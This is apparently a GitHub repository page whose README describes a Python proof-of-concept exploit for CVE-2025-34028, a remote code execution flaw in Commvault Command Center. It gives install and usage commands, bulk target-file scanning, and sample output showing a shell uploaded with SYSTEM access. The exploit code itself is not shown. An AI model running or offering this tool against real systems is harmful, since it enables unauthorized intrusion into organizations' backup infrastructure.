Skip to content

Mattb709/CVE-2025-34028-PoC-Commvault-RCE

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
CVE-2025-34028-Commvault.py
CVE-2025-34028-Commvault.py
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

CVE-2025-34028 - Commvault Command Center Remote Code Execution

Python License Vulnerability

A Python exploit for CVE-2025-34028, a remote code execution vulnerability in Commvault Command Center. This tool allows testing single targets or scanning multiple hosts in bulk.

Features

  • Single target or bulk scanning capability
  • Automatic Commvault instance verification
  • Detailed output with system user information
  • Random path generation for each execution
  • Clean summary table of vulnerable hosts
  • Comprehensive error handling

Installation

git clone https://github.com/Mattb709/CVE-2025-34028-Commvault
cd CVE-2025-34028-Commvault
pip install -r requirements.txt

Requirements

  • Python 3.6+
  • Required packages:
    • requests
    • tabulate

Install requirements with:

pip install requests tabulate

Usage

usage: CVE-2025-34028-Commvault.py [-h] (-t TARGET | -f TARGETS_FILE)

CVE-2025-34028 Commvault RCE Exploit

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Single target URL (e.g., https://192.168.1.100:8000)
  -f TARGETS_FILE, --file TARGETS_FILE
                        File containing multiple targets, one per line

Examples

Test a single target:

python CVE-2025-34028-Commvault.py -t https://commvault.example.com:8000

Scan multiple targets from a file:

python CVE-2025-34028-Commvault.py -f targets.txt

Target File Format

The targets file should contain one target per line in the format:

https://host:port
http://ip

Example targets.txt:

https://cv.company.com:8000
http://192.168.1.100
https://10.10.10.5:443

Output

The script provides:

  • Real-time progress with status for each target
  • Detailed output for vulnerable hosts
  • Summary table of all tested hosts
  • Clear identification of successful exploitations

Sample output:

CVE-2025-34028 Commvault RCE PoC

[1] Processing target: https://cvtest.example.com:8000
[1] [+] Valid Commvault instance detected
[1] [+] Shell uploaded successfully
[1] [+] System User: NT AUTHORITY\SYSTEM

[+] Results Summary
+---------+------------------------------+---------------------+------------------+
| Index   | URL                          | Status              | System User      |
+---------+------------------------------+---------------------+------------------+
| 1       | https://cvtest.example.com:8000 | RCE Successful      | NT AUTHORITY\SYSTEM |
+---------+------------------------------+---------------------+------------------+

Disclaimer

This tool is for educational and authorized testing purposes only. The author is not responsible for any misuse or damage caused by this program.

License

MIT License - See LICENSE file for details

About

Proof-of-Concept (PoC) for CVE-2025-34028, a Remote Code Execution vulnerability in Commvault Command Center. This Python script scans single or multiple targets, executes commands, and reports vulnerable hosts.

Topics

cve-2025-34028

Resources

Readme

License

MIT license
Activity

Stars

2 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages